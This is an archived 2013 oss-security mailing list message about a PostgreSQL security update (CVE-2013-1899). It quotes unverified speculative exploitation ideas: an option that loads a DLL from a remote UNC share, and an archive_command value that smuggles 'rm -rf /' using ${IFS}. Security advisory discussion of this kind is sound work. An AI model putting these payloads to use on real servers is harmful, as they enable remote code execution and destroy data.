Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Thu, 4 Apr 2013 18:48:16 +0400
From: Solar Designer <solar@...nwall.com>
To: oss-security@...ts.openwall.com
Subject: Re: PostgreSQL security update

On Thu, Apr 04, 2013 at 06:39:31PM +0400, Solar Designer wrote:
> A heads-up in case someone missed today's news:
> 
> http://www.postgresql.org/about/news/1456/
> http://www.postgresql.org/support/security/faq/2013-04-04/

HD Moore's quick tweets on possible exploitability of CVE-2013-1899 into
remote code execution (beyond the attack vectors mentioned in
"2013-04-04 Security Release FAQ" above):

<@hdmoore> @quine exploitation seems tricky, I wonder if -c shared_preload_libraries=\\unc\share\blah.dll is doable
<@hdmoore> @quine Another options appears to be something like: -c archive_command=rm${IFS}-rf${IFS}/

Indeed, these have not been verified yet and they might not be doable.

Alexander

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.